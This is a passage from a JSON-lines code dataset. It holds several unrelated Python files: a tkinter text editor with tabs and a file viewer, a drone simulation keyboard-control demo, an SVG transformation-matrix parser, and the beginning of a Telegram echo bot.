views.DeletePost.as_view(),\n name=\"delete\"\n ),\n]\n","sub_path":"msg/posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"22689732","text":"import tkinter as tk\r\nimport tkinter.ttk as ttk\r\nfrom tkinter import filedialog\r\nfrom tkinter import messagebox\r\nfrom keyword import kwlist\r\nfrom types import FunctionType\r\nfrom PIL import ImageTk, Image\r\nimport pyperclip\r\nimport json\r\nimport os\r\nimport re\r\n# colors\r\nwhite = (255,255,255)\r\nblack = (0,0,0)\r\nred = (255, 0, 0)\r\ngreen = (0, 255, 0)\r\nblue = (0, 0, 255)\r\n# style of the Editor\r\nwindowWidth = 800\r\nwindowHeight =800\r\neditorWidth = 50\r\neditorHeight = 50\r\nroot = tk.Tk()\r\n# root.title('Fox-editor')\r\n# mainFrame\r\nroot.option_add('*tearOff', tk.FALSE)\r\nroot.configure(background='grey')\r\nletters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSUVWXYZ'\r\ns = 0\r\ndef putIntoDict(path=''):\r\n if path=='':\r\n path = filedialog.askdirectory()\r\n A = {}\r\n B = os.listdir(path)\r\n for i in B:\r\n if os.path.isdir(os.path.join(path, i)):\r\n A[i] = putIntoDict(path=os.path.join(path, i))\r\n else:\r\n A[i] = os.path.normpath(os.path.join(path, i))\r\n return A\r\n\t# dicti = {}\r\n\t# for i in val:\r\n\t# \tif type(val[i]) is dict:\r\n\t# \t\tdicti[i] = putIntoDict(val[i])\r\n\t# \telse:\r\n\t# \t\tdicti[i] = val[i]\r\n\t# return dicti\r\ndef isText(filePath):\r\n bytes = open(filePath, 'rb').read(1024)\r\n return not bool(bytes.translate(None, bytearray({7,8,9,10,12,13,27} | set(range(0x20, 0x100)) - {0x7f})))\r\n\r\nsettings = {}\r\nclass Editor(ttk.Notebook):\r\n def __init__(self, frame=root):\r\n super().__init__(frame)\r\n self.enable_traversal()\r\n self.pack(fill=tk.BOTH, expand=True)\r\n self.editorTabs = []\r\n self.editorTabFrames = []\r\n self.editorFiles = []\r\n self.history = []\r\n self.isSaved = []\r\n # with open(os.path.split(os.path.realpath(__file__))[0]+'\\\\data.json', 'r+') as data_file:\r\n # settings = eval(json.loads(data_file.read()))\r\n\r\nclass Menubar(tk.Menu):\r\n def __init__(self, frame=root):\r\n super().__init__(frame)\r\n\r\n self.file = tk.Menu(self)\r\n self.edit = tk.Menu(self)\r\n self.view = tk.Menu(self)\r\n\r\n self.add_cascade(menu=self.file, label='File')\r\n self.add_cascade(menu=self.edit, label='Edit')\r\n self.add_cascade(menu=self.view, label='View')\r\n\r\nclass ContextMenu(tk.Menu):\r\n def __init__(self, frame=root):\r\n super().__init__(frame)\r\n\r\nclass FileViewer(ttk.Treeview):\r\n def __init__(self, frame=root):\r\n super().__init__(frame)\r\n self.pack(side=tk.LEFT, expand=False, fill=tk.BOTH)\r\n self.projectFolders = {}\r\n self.tempFolders = {}\r\n\r\nclass SideTool(ttk.Frame):\r\n def __init__(self, frame=root):\r\n super().__init__(frame)\r\n self.pack(side=tk.LEFT, expand=False, fill=tk.BOTH)\r\n\r\nclass Application(tk.Frame):\r\n def __init__(self, master=root):\r\n super().__init__(master)\r\n\r\n self.focus_set()\r\n\r\n self.pack()\r\n self.SAVE = 0\r\n self.SAVE_AS = 1\r\n\r\n self.OPEN_FILE = 0\r\n self.OPEN_FOLDER_TEMP = 1\r\n self.OPEN_FOLDER_PROJECT = 2\r\n\r\n self.OPEN_NEW_DOCUMENT_TAB = 0\r\n self.OPEN_FILE_TAB = 1\r\n self.OPEN_FILE_TAB_BINARY = 2\r\n self.OPEN_HELP_TAB = 3\r\n self.OPEN_SETTING_TAB = 4\r\n\r\n self.FILE_CONTEXT_MENU = 0 # when you click on a file in the file viewer\r\n self.FOLDER_CONTEXT_MENU = 1 # when you click on a foler in the file viewer\r\n self.TEXT_CONTEXT_MENU = 2 # then you click on the text in a tab\r\n self.TAB_CONTEXT_MENU = 3 # then you click on the tab\r\n self.FILEVIEWER_CONTEXT_MENU = 4 # when you click on the fileviewer without clicking on a folder or file\r\n self.EDITOR_CONTEXT_MENU = 5\r\n\r\n self.RENAME_FILE = 0\r\n self.DELETE_FILE = 1\r\n self.COPY_FILE_PATH = 2\r\n self.ENTER_THIS_DIRECTORY = 3 # set the current current working directory to this folder\r\n\r\n self.TAB_HELP = 0\r\n self.TAB_SETTINGS = 1\r\n self.TAB_BINARY = 2\r\n\r\n self.create_widgets()\r\n\r\n def create_widgets(self):\r\n self.menu = Menubar()\r\n\r\n self.menu.file.add_command(label='New', command=self.newFile)\r\n self.menu.file.add_command(label='Open file', command=lambda : self.openFile(fileType=self.OPEN_FILE))\r\n self.menu.file.add_command(label='Open Folder', command=lambda : self.openFile(fileType=self.OPEN_FOLDER_TEMP))\r\n self.menu.file.add_command(label='Close', command=lambda: self.closeTab())\r\n self.menu.file.add_command(label='Save', command=lambda : self.saveFile(saveType=self.SAVE))\r\n self.menu.file.add_command(label='Save as', command=lambda : self.saveFile(saveType=self.SAVE_AS))\r\n self.menu.file.add_command(label='Add Folder', command=lambda : self.openFile(fileType=self.OPEN_FOLDER_PROJECT))\r\n self.menu.file.add_command(label='Copy full path', command=self.copyPath)\r\n self.menu.file.add_command(label='Reopen last tab', command=self.reopenLastFile)\r\n self.menu.add_command(label='Settings', command=lambda:self.openTab(tabType=self.OPEN_SETTING_TAB))\r\n\r\n self.contextMenu = ContextMenu()\r\n\r\n self.contextMenu.add_command(label='New', command=self.newFile)\r\n self.contextMenu.add_command(label='Open file', command=lambda : self.openFile(fileType=self.OPEN_FILE))\r\n self.contextMenu.add_command(label='Open Folder', command=lambda : self.openFile(fileType=self.OPEN_FOLDER_TEMP))\r\n self.contextMenu.add_command(label='Close', command=lambda: self.closeTab())\r\n self.contextMenu.add_command(label='Save', command=lambda : self.saveFile(saveType=self.SAVE))\r\n self.contextMenu.add_command(label='Save as', command=lambda : self.saveFile(saveType=self.SAVE_AS))\r\n self.contextMenu.add_command(label='Add Folder', command=lambda : self.openFile(fileType=self.OPEN_FOLDER_PROJECT))\r\n self.contextMenu.add_command(label='Copy full path', command=self.copyPath)\r\n self.contextMenu.add_command(label='Reopen last tab', command=self.reopenLastFile)\r\n self.contextMenu.add_command(label='Settings', command=lambda:self.openTab(tabType=self.OPEN_SETTING_TAB))\r\n\r\n self.bindKeys()\r\n\r\n self.fileviewer = FileViewer()\r\n self.editor = Editor()\r\n self.openTab()\r\n root.config(menu=self.menu)\r\n self.tool = SideTool()\r\n if (root.tk.call('tk', 'windowingsystem')=='aqua'):\r\n root.bind('<2>', self.onSelect)\r\n root.bind('', self.onSelect)\r\n else:\r\n root.bind(\"\", self.onSelect)\r\n # def n(s, window):\r\n # def buttonPress():\r\n # s.openFile()\r\n # window.destroy()\r\n # button1 = tk.Button(window, text='openFile', command=buttonPress)\r\n # button1.pack()\r\n # self.customDialog('hi', 'hello', n)\r\n\r\n def openTab(self, index='len(self.editor.tabs())', name='untitled', tabType=0, path=''):\r\n f = eval(index)\r\n self.editor.editorTabFrames.insert(f, tk.Frame(self.editor))\r\n self.editor.editorTabFrames[f].pack(fill=tk.BOTH, expand=True)\r\n try:\r\n self.editor.insert(f, self.editor.editorTabFrames[f], text=name)\r\n except tk.TclError:\r\n self.editor.add(self.editor.editorTabFrames[f], text=name)\r\n if tabType==self.OPEN_NEW_DOCUMENT_TAB:\r\n self.editor.editorTabs.insert(f, tk.Text(self.editor.editorTabFrames[f]))\r\n self.editor.editorFiles.insert(f, None)\r\n self.editor.isSaved.insert(f, True)\r\n elif tabType==self.OPEN_FILE_TAB:\r\n self.editor.editorTabs.insert(f, tk.Text(self.editor.editorTabFrames[f]))\r\n print('added tab')\r\n self.editor.isSaved.insert(f, True)\r\n if path != '':\r\n self.editor.editorTabs[f].insert('1.0', open(path).read())\r\n self.editor.editorFiles.insert(f, path)\r\n else:\r\n path = filedialog.askopenfilename(title='Choose file')\r\n self.editor.editorTabs[f].insert('1.0', open(path).read())\r\n self.editor.editorFiles.insert(f, path)\r\n elif tabType==self.OPEN_FILE_TAB_BINARY:\r\n \"\"\"Open a binary file like an image\"\"\"\r\n img=ImageTk.PhotoImage(Image.open(path))\r\n self.editor.editorTabs.insert(f, tk.Label(self.editor.editorTabFrames[f], image=img))\r\n self.editor.editorTabs[f].pack(side = \"bottom\", fill = \"both\", expand = \"yes\")\r\n self.editor.editorFiles.insert(f, path)\r\n self.editor.isSaved.insert(f, True)\r\n elif tabType==self.OPEN_HELP_TAB:\r\n self.editor.editorTabs.insert(f, tk.Label(self.editor.editorTabFrames[f]))\r\n self.editor.editorFiles.insert(f, self.TAB_HELP)\r\n self.editor.isSaved.insert(f, True)\r\n elif tabType==self.OPEN_SETTING_TAB:\r\n self.editor.editorTabs.insert(f, tk.Label(self.editor.editorTabFrames[f]))\r\n self.editor.editorFiles.insert(f, self.TAB_SETTINGS)\r\n self.editor.isSaved.insert(f, True)\r\n else:\r\n print('Error: index=', index, ' name=', name, ' type=', str(tabType), ' path=', path)\r\n return\r\n if (root.tk.call('tk', 'windowingsystem')=='aqua'):\r\n root.bind('<2>', lambda e: self.onSelect(e))\r\n root.bind('', lambda e: self.onSelect(e))\r\n else:\r\n root.bind(\"\", lambda e: self.onSelect(e))\r\n if not type(self.editor.editorTabs[f]) is int:\r\n self.editor.editorTabs[f].pack(fill=tk.BOTH, expand=True)\r\n def noSave(e):\r\n if e.keysym in letters:\r\n self.editor.isSaved[f] = False\r\n if not type(self.editor.editorTabs[f]) is int:\r\n self.editor.editorTabs[f].bind('', noSave)\r\n self.editor.select(self.editor.tabs()[f])\r\n\r\n def closeTab(self, tabIndex='self.editor.index(self.editor.select())'):\r\n\r\n if type(tabIndex) is int:\r\n index = tabIndex\r\n else:\r\n index = eval(tabIndex)\r\n if messagebox.askokcancel(message='You are about to close \\'%s\\'. Do you want to close this window' % (self.editor.tab(self.editor.tabs()[index])['text']), parent=root):\r\n if type(self.editor.editorFiles[index]) is str:\r\n self.editor.history.append(self.editor.editorFiles[index])\r\n if type(self.editor.editorFiles[index]) is None:\r\n if messagebox.askyesno(message='You are about to close \\'%s\\' with out saving. Do you want to save \\'%s\\' as a fie on your computer?' % (self.editor.tab(self.editor.tabs()[index])['text'], self.editor.tab(self.editor.tabs()[index])['text']), parent=root):\r\n self.saveAs(index)\r\n elif not self.editor.isSaved[index]:\r\n if messagebox.askyesno(message='You are about to close \\'%s\\' with out saving. Do you want to save your changes to\\'%s\\'' % (self.editor.tab(self.editor.tabs()[index])['text'], self.editor.tab(self.editor.tabs()[index])['text']), parent=root):\r\n self.save(index)\r\n self.editor.editorTabs.remove(self.editor.editorTabs[index])\r\n self.editor.forget(self.editor.editorTabFrames[index])\r\n self.editor.editorTabFrames.remove(self.editor.editorTabFrames[index])\r\n self.editor.editorFiles.remove(self.editor.editorFiles[index])\r\n self.editor.isSaved = self.editor.isSaved[:index] + self.editor.isSaved[index+1 :]\r\n\r\n def openFile(self, path='', fileType=0):\r\n if fileType==self.OPEN_FILE and (os.path.isfile(path) or path == ''):\r\n if path=='':\r\n path = filedialog.askopenfilename(title='Choose file')\r\n if path=='':\r\n return\r\n if isText(path):\r\n self.openTab(name=os.path.split(path)[1], tabType=self.OPEN_FILE_TAB, path=path)\n else:\n self.openTab(name=os.path.split(path)[1], tabType=self.OPEN_FILE_TAB_BINARY, path=path)\n elif fileType==self.OPEN_FOLDER_TEMP and (os.path.isdir(path) or path == ''):\n if path=='':\n path = filedialog.askdirectory(title='Choose file')\n if path=='':\n return\n self.fileviewer.tempFolders[path] = putIntoDict(path)\n self.updateFileviewer()\n elif fileType==self.OPEN_FOLDER_PROJECT and (os.path.isdir(path) or path == ''):\n if path=='':\n path = filedialog.askdirectory(title='Choose file')\n if path=='':\n return\n print('add a project folder for repeated use')\n else:\n print('Error: path=', path, ' type=', str(fileType))\n return\n\n def saveFile(self, tabIndex='self.editor.index(self.editor.select())', saveType=0):\r\n index = eval(tabIndex)\r\n if (type(self.editor.editorFiles[index]) is str) and saveType==self.SAVE:\r\n open(self.editor.editorFiles[index], 'w+').write(self.editor.editorTabs[index].get('1.0', 'end -1 c'))\r\n self.editor.isSaved[index] = True\r\n print('saved')\r\n elif saveType==self.SAVE_AS:\r\n f = filedialog.asksaveasfilename()\r\n if f == '':\r\n return ''\r\n if isText(self.editor.editorFiles[index]):\r\n open(f, 'w+').write(self.editor.editorTabs[index].get('1.0', 'end -1 c'))\r\n self.editor.editorFiles[index] = f\r\n self.editor.isSaved[index] = True\r\n self.editor.tab(self.editor.select(), text=os.path.split(f)[1])\r\n else:\r\n print('Error: index=', tabIndex, ' type=', str(saveType))\r\n return\r\n\r\n def saveAs(self, tabIndex='self.editor.index(self.editor.select())'):\r\n self.saveFile(tabIndex=tabIndex, saveType=self.SAVE_AS)\r\n\r\n def newFile(self):\r\n print('new tab')\r\n self.openTab(tabType=self.OPEN_NEW_DOCUMENT_TAB)\r\n\r\n def customDialog(self, title, message, frameOrButtons, window=root):\r\n if window == root:\r\n cwindow = self.cwindow = tk.Toplevel(root)\r\n cwindow.title(title)\r\n if type(frameOrButtons) == dict:\r\n buttons = []\r\n for i in frameOrButtons:\r\n buttons.append(tk.Button(cwindow, text=i, command=frameOrButtons[i]()))\r\n buttons[-1].pack()\r\n elif isinstance(frameOrButtons, tk.Frame):\r\n frame = frameOrButtons\r\n frame.pack()\r\n elif isinstance(frameOrButtons, FunctionType):\r\n frameOrButtons(self, cwindow)\r\n\r\n def reopenLastFile(self):\r\n self.openFile(path=self.editor.history.pop())\r\n\r\n def copyPath(self, tabIndex='self.editor.index(self.editor.select())'):\r\n index = eval(tabIndex)\r\n pyperclip.copy(self.editor.editorFiles[index])\r\n\r\n def insertTree(self, parentId='', dicti={}):\r\n for i in dicti:\r\n if self.fileviewer.exists(i):\r\n self.fileviewer.delete(i)\r\n self.fileviewer.insert(parentId, 'end', i, text=os.path.split(i)[1])\r\n if type(dicti[i]) == dict:\r\n self.insertTree(i, dicti[i])\r\n\r\n def updateFileviewer(self):\r\n for i in self.fileviewer.tempFolders:\r\n if self.fileviewer.exists(i):\r\n self.fileviewer.delete(i)\r\n self.fileviewer.insert('', 'end', i, text=os.path.basename(i)+' - '+os.path.split(i)[0])\r\n self.insertTree(i, self.fileviewer.tempFolders[i])\r\n\r\n def onSelect(self, event):\r\n widget = self.winfo_containing(event.x_root, event.y_root)\r\n if type(widget) == tk.Text:\r\n self.updateContextMenu(self.TEXT_CONTEXT_MENU, event=event)\r\n elif type(widget) == Editor:\r\n if event.widget.identify(event.x, event.y) == 'label':\r\n print(event.widget.index('@%d,%d' % (event.x, event.y)))\r\n self.updateContextMenu(self.TAB_CONTEXT_MENU, event=event, index=event.widget.index('@%d,%d' % (event.x, event.y)))\r\n else:\r\n self.updateContextMenu(self.EDITOR_CONTEXT_MENU, event=event)\r\n elif type(widget) == FileViewer:\r\n self.fileSelect(event)\r\n\r\n def fileSelect(self, event):\r\n iid = self.fileviewer.identify_row(event.y)\r\n if iid:\r\n # mouse pointer over item\r\n self.fileviewer.selection_set(iid)\r\n print(iid)\r\n if os.path.isdir(iid):\r\n self.updateContextMenu(self.FOLDER_CONTEXT_MENU, event=event, itemId=iid)\r\n else:\r\n self.updateContextMenu(self.FILE_CONTEXT_MENU, event=event, itemId=iid)\r\n # self.contextMenu.post(event.x_root, event.y_root)\r\n print(iid)\r\n else:\r\n self.updateContextMenu(self.FILEVIEWER_CONTEXT_MENU, event);\r\n\r\n def updateContextMenu(self, menuType, event, **dictargs):\r\n menuArr = []\r\n if self.FILE_CONTEXT_MENU == menuType:\r\n print('hi-file')#\r\n menuArr = [\r\n \"\"\"\r\n - open this file\r\n - save file\r\n - close\r\n - delete\r\n - rename file\r\n - duplicate\r\n - move\r\n - new file in this directory\r\n - ---------\r\n - open a file\r\n - close tab\r\n - close window\r\n - save\r\n - save as\r\n - new file\r\n \"\"\"\r\n ]\r\n elif self.FOLDER_CONTEXT_MENU == menuType:\r\n print('hi-folder')#\r\n menuArr = []\r\n elif self.TEXT_CONTEXT_MENU == menuType:\r\n print('hi-text')#\r\n elif self.TAB_CONTEXT_MENU == menuType:\r\n print('hi-tab')#\r\n elif self.FILEVIEWER_CONTEXT_MENU == menuType:\r\n print('hi-fileviewer')#\r\n elif self.EDITOR_CONTEXT_MENU == menuType:\r\n print('hi-editor')#\r\n self.menuFromArr(menuArr, self.contextMenu)\r\n self.contextMenu.post(event.x_root, event.y_root)\r\n\r\n def menuFromArr(self, arra, parent=root):\r\n for i in arra:\r\n if i[0] == 'command':\r\n parent.add_command(label=i[1], command=i[2])\r\n elif i[0] == 'separator':\r\n parent.add_separator()\r\n elif i[0] == 'cascade':\r\n print('cascade')\r\n cascade = tk.Menu(parent)\r\n parent.add_cascade(menu=cascade, label=i[1])\r\n self.menuFromArr(arra=i[2], parent=cascade)\r\n\r\n def bindKeys(self):\r\n root.bind('', lambda e : self.saveFile())\r\n root.bind('', lambda e : self.saveAs())\r\n root.bind('',lambda e : self.openFile())\r\n root.bind('', lambda e: self.openFile(fileType=self.OPEN_FOLDER_TEMP))\r\n root.bind('', lambda e : self.closeTab())\r\n root.bind('', lambda e : print('f'))\r\n \"\"\"does not work ^\"\"\"\r\n root.bind('', lambda e : self.reopenLastFile())\r\n root.bind('', lambda e=None : self.newFile())\r\n # def setSideTool(self, tool=0):\r\n # if\r\n\r\n # def pickColor(self):\r\n #\r\n # def findAndReplace(self, find, replace):\r\n #\r\n # def beautify(self):\r\n #\r\n # def calculator(self):\r\n #\r\n # def glossary(self):\r\n #\r\n # def match(self):\r\n\r\n # def highlightText(self, event=None):\r\n # self.editor.tag_config('int', foreground='blue')\r\n # self.editor.tag_config('str', foreground='yellow')\r\n # self.editor.tag_config('self', foreground='red')\r\n # self.editor.tag_config('key word', foreground='purple')\r\n # self.editor.tag_config('init func', foreground='green')\r\n # self.editor.tag_config('class', foreground='orange')\r\n # keywords = kwList\r\n # def testInt(val):\r\n #\r\n # def testStr(val):\r\n #\r\n # def testBool(val):\r\n #\r\n # def testKeyword(val):\r\n #\r\n # def testFunc(val):\r\n #\r\n # def testClass(val):\r\n #\r\n # def testSelf(val):\r\n #\r\n # def testParam(val):\r\n #\r\n # def testComment(val):\r\n #\r\n # def testPreFunc(val):\r\n #\r\n #\r\n # regDict = {\r\n # 'int': testInt,\r\n # 'str': testStr,\r\n # 'bool': testBool,\r\n # 'keyword': testKeyword,\r\n # 'function': testFunc,\r\n # 'class': testClass,\r\n # 'self': testSelf,\r\n # 'paramiter': testParam,\r\n # 'comment': testComment,\r\n # 'predefinedFunc': testPreFunc,\r\n # }\r\n #\r\n # print('x')\r\n # cline = self.editor.index(tk.INSERT).split('.')[0]\r\nroot.geometry(\"1000x500\")\r\napp = Application(master=root)\r\n# app.bind('', app.highlightText)\r\napp.mainloop()\r\n","sub_path":"editor.py","file_name":"editor.py","file_ext":"py","file_size_in_byte":20992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"495332855","text":"from mrsgym import *\nfrom mrsgym.Util import *\nimport gym\nimport numpy as np\n\ndef main():\n\tN = 3\n\tenv = gym.make('mrs-v0', state_fn=state_fn, N_AGENTS=1, ACTION_TYPE='set_target_ori', RETURN_EVENTS=True)\n\tactions = torch.zeros(N,3)\n\twhile True:\n\t\tX, reward, done, info = env.step(actions)\n\t\tactions = key_to_action(info[\"keyboard_events\"]).expand(N,-1)\n\t\tset_camera(env.env)\n\t\tadd_axis(env.env)\n\t\tenv.wait()\n\ndef key_to_action(keys):\n\taction = torch.zeros(3)\n\tif Key.up in keys:\n\t\taction[1] += np.pi/4\n\tif Key.down in keys:\n\t\taction[1] -= np.pi/4\n\tif Key.left in keys:\n\t\taction[0] -= np.pi/4\n\tif Key.right in keys:\n\t\taction[0] += np.pi/4\n\tif Key.space in keys:\n\t\taction[2] += np.pi/2\n\tif Key.option in keys:\n\t\taction[2] -= np.pi/2\n\treturn action\n\n\ndef state_fn(quad):\n\treturn torch.cat([quad.get_pos(), quad.get_vel()])\n\ndef set_camera(env):\n\tagent_pos = env.agents[0].get_pos()\n\tenv.set_camera(pos=agent_pos + torch.tensor([-1,0,0.5]), target=agent_pos)\n\ndef add_axis(env):\n\tagent = env.agents[0]\n\tenv.add_line(start=[0.,0.,0.], end=[0.2,0.,0.], parent=agent, name='agent_forward', lifetime=0.1, colour=[0.,0.,1.])\n\nif __name__ == '__main__':\n\tmain()","sub_path":"examples/env_examples/ori_control_demo.py","file_name":"ori_control_demo.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"341656172","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see \n#\n# @author : pascal.fautrero@gmail.com\n\nimport re, math\n\nclass CurrentTransformation:\n \"\"\" Used to analyze transformation applied on svg element\n CTM (Current Transformation Matrix)\n expected forms :\n matrix(a b c d e f)\n translate(x y)\n translate(a)\n scale(a)\n scale(sx sy)\n rotate(angle cx cy)\n skewX(x)\n skewY(y)\n\n \"\"\"\n\n def __init__(self):\n \"\"\"Init\"\"\"\n self.matrix = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0]]\n self.rotate = 0\n self.rX = 0\n self.rY = 0\n self.translateX = 0\n self.translateY = 0\n self.scaleX = 1\n self.scaleY = 1\n\n def print(self):\n print(f\"rotate = {self.rotate}\")\n print(f\"rX = {self.rX}\")\n print(f\"rY = {self.rY}\")\n print(f\"translateX = {self.translateX}\")\n print(f\"translateY = {self.translateY}\")\n print(f\"scaleX = {self.scaleX}\")\n print(f\"scaleY = {self.scaleY}\")\n\n def analyze(self,entry):\n \"\"\"Analyze transform attribute\"\"\"\n regex_group = r'([^\\s,]*)\\s*,?\\s*'\n\n # look for something with such a form : \"matrix(a b c d e f)\"\n regex_matrix = r'matrix\\(\\s*' + regex_group * 6 + r'\\)'\n matchObj = re.match( regex_matrix, entry)\n if matchObj:\n self.extractMatrix(matchObj.groups())\n return\n\n # look for something with such a form : \"translate(a)\"\n regex_translate = r'translate\\(\\s*' + regex_group * 1 + r'\\)'\n matchObj = re.match( regex_translate, entry)\n if matchObj:\n self.extractTranslate(matchObj.groups())\n return\n\n # look for something with such a form : \"translate(a b)\"\n regex_translate = r'translate\\(\\s*' + regex_group * 2 + r'\\)'\n matchObj = re.match( regex_translate, entry)\n if matchObj:\n self.extractTranslate(matchObj.groups())\n return\n\n # look for something with such a form : \"rotate(a)\"\n regex_rotate = r'rotate\\(\\s*' + regex_group * 1 + r'\\)'\n matchObj = re.match( regex_rotate, entry)\n if matchObj:\n self.extractRotate(matchObj.groups())\n return\n\n # look for something with such a form : \"rotate(a b c)\"\n regex_rotate = r'rotate\\(\\s*' + regex_group * 3 + r'\\)'\n matchObj = re.match( regex_rotate, entry)\n if matchObj:\n self.extractRotate(matchObj.groups())\n return\n\n # look for something with such a form : \"scale(a)\"\n regex_scale = r'scale\\(\\s*' + regex_group * 1 + r'\\)'\n matchObj = re.match( regex_scale, entry)\n if matchObj:\n self.extractScale(matchObj.groups())\n return\n\n # look for something with such a form : \"scale(a b)\"\n regex_scale = r'scale\\(\\s*' + regex_group * 2 + r'\\)'\n matchObj = re.match( regex_scale, entry)\n if matchObj:\n self.extractScale(matchObj.groups())\n return\n\n\n def extractTranslate(self,groups):\n \"\"\"extract a and b from translate(a b) pattern\"\"\"\n self.translateX = float(groups[0])\n self.translateY = float(groups[0])\n if len(groups) == 2 and groups[1]:\n self.translateY = float(groups[1])\n self.matrix = [[1.0, 0.0, self.translateX], \\\n [0.0, 1.0, self.translateY]]\n\n def extractScale(self,groups):\n \"\"\"extract a and b from scale(a b) pattern\"\"\"\n self.scaleX = float(groups[0])\n self.scaleY = float(groups[0])\n if len(groups) == 2 and groups[1]:\n self.scaleY = float(groups[1])\n self.matrix = [[self.scaleX, 0.0, 0.0], \\\n [0.0, self.scaleY, 0.0]]\n\n\n def extractRotate(self,groups):\n \"\"\"extract a,b and c from rotate(a b c) pattern\n cos(a) -sin(a) -cx.cos(a) + cy.sin(a) + cx\n sin(a) cos(a) -cx.sin(a) - cy.cos(a) + cy\n 0 0 1\n \"\"\"\n self.rotate = math.pi * float(groups[0]) / 180\n self.rX = 0\n self.rY = 0\n if len(groups) == 3:\n if groups[1]:\n \tself.rX = float(groups[1])\n if groups[2]:\n \tself.rY = float(groups[2])\n\n #alpha = float(self.rotate)\n alpha = self.rotate\n cx = self.rX\n cy = self.rY\n self.matrix = [ [\n math.cos(alpha),\n -math.sin(alpha),\n -cx * math.cos(alpha) + cy * math.sin(alpha) + cx\n ],\n [\n math.sin(alpha),\n math.cos(alpha),\n -cx * math.sin(alpha) - cy * math.cos(alpha) + cy\n ]\n ]\n\n def extractMatrix(self,groups):\n \"\"\"extract a,b,c,d,e,f from matrix(a b c d e f) pattern\"\"\"\n a = float(groups[0])\n b = float(groups[1])\n c = float(groups[2])\n d = float(groups[3])\n e = float(groups[4])\n f = float(groups[5])\n self.matrix=[[a,c,e], [b,d,f]]\n self.translateX = e\n self.translateY = f\n self.scaleX = math.sqrt(a**2+c**2)\n self.scaleY = math.sqrt(b**2+d**2)\n self.rotate = math.atan2(b,d)\n\n def rectToPath(self,node):\n \"\"\"inspired from inkscape pathmodifier.py\"\"\"\n x = float(node['x'])\n y = float(node['y'])\n w = float(node['width'])\n h = float(node['height'])\n rx = 0\n ry = 0\n if 'rx' in node:\n rx = float(node['rx'])\n if 'ry' in node:\n ry = float(node['ry'])\n\n if rx==0 or ry ==0:\n d ='M %f,%f '%(x,y)\n d+='L %f,%f '%(x+w,y)\n d+='L %f,%f '%(x+w,y+h)\n d+='L %f,%f '%(x,y+h)\n d+='L %f,%f '%(x,y)\n else:\n d ='M %f,%f '%(x+rx,y)\n d+='L %f,%f '%(x+w-rx,y)\n d+='A %f,%f 0 0 1 %f,%f'%(rx,ry,x+w,y+ry)\n d+='L %f,%f '%(x+w,y+h-ry)\n d+='A %f,%f 0 0 1 %f,%f'%(rx,ry,x+w-rx,y+h)\n d+='L %f,%f '%(x+rx,y+h)\n d+='A %f,%f 0 0 1 %f,%f'%(rx,ry,x,y+h-ry)\n d+='L %f,%f '%(x,y+ry)\n d+='A %f,%f 0 0 1 %f,%f'%(rx,ry,x+rx,y)\n\n return d\n\n def circleToPath(self,node):\n \"\"\"inspired from inkscape pathmodifier.py\"\"\"\n cx = float(node['cx'])\n cy = float(node['cy'])\n r = 0\n if 'r' in node:\n r = float(node['r'])\n\n d ='M %f,%f '%(cx-r,cy)\n d+='A %f,%f 0 0 1 %f,%f'%(r,r,cx,cy-r)\n d+='A %f,%f 0 0 1 %f,%f'%(r,r,cx+r,cy)\n d+='A %f,%f 0 0 1 %f,%f'%(r,r,cx,cy+r)\n d+='A %f,%f 0 0 1 %f,%f'%(r,r,cx-r,cy)\n\n return d\n\n def ellipseToPath(self,node):\n \"\"\"inspired from inkscape pathmodifier.py\"\"\"\n cx = float(node['cx'])\n cy = float(node['cy'])\n rx = 0\n ry = 0\n if 'rx' in node:\n rx = float(node['rx'])\n if 'ry' in node:\n ry = float(node['ry'])\n\n d ='M %f,%f '%(cx-rx,cy)\n d+='A %f,%f 0 0 1 %f,%f'%(rx,ry,cx,cy-ry)\n d+='A %f,%f 0 0 1 %f,%f'%(rx,ry,cx+rx,cy)\n d+='A %f,%f 0 0 1 %f,%f'%(rx,ry,cx,cy+ry)\n d+='A %f,%f 0 0 1 %f,%f'%(rx,ry,cx-rx,cy)\n\n return d\n\n def inv_matrix(self):\n a = self.matrix[0][0]\n b = self.matrix[1][0]\n c = self.matrix[0][1]\n d = self.matrix[1][1]\n e = self.matrix[0][2]\n f = self.matrix[1][2]\n delta = a*d-b*c\n return [d/delta, (-1)*c/delta, (c*f-d*e)/delta,\n (-1)*b/delta, a/delta, (b*e-a*f)/delta]\n\n def applyTransformToPoint(self,mat,pt):\n x = mat[0][0]*pt[0] + mat[0][1]*pt[1] + mat[0][2]\n y = mat[1][0]*pt[0] + mat[1][1]*pt[1] + mat[1][2]\n #pt[0]=x\n #pt[1]=y\n return x, y\n\n def applyTransformToPath(self,mat,path):\n for comp in path:\n for ctl in comp:\n for pt in ctl:\n pt[0], pt[1] = self.applyTransformToPoint(mat,pt)\n","sub_path":"src/xiaconverter/ctm.py","file_name":"ctm.py","file_ext":"py","file_size_in_byte":8752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"560966287","text":"import telepot\nfrom config import TOKEN\nimport sys, time\n\nwebsite = \"https://api.telegram.org/bot\"\n\ndef pappagallo(msg):\n content_type, chat_type, chat_id = telepot.glance(msg)\n\n if content_type == 'text':\n message = msg[\"from\"][\"first_name\"]\n text = msg['text']\n\n bot.sendMessage(chat_id, text)\n\n\nbot = telepot.Bot(TOKEN)\nbot.message_loop(pappagallo) ##Messaggio loop\n\nprint('Listening ...')\n\n#Ciclo infinito per tenerlo sempre vivo\nwhile True:\n 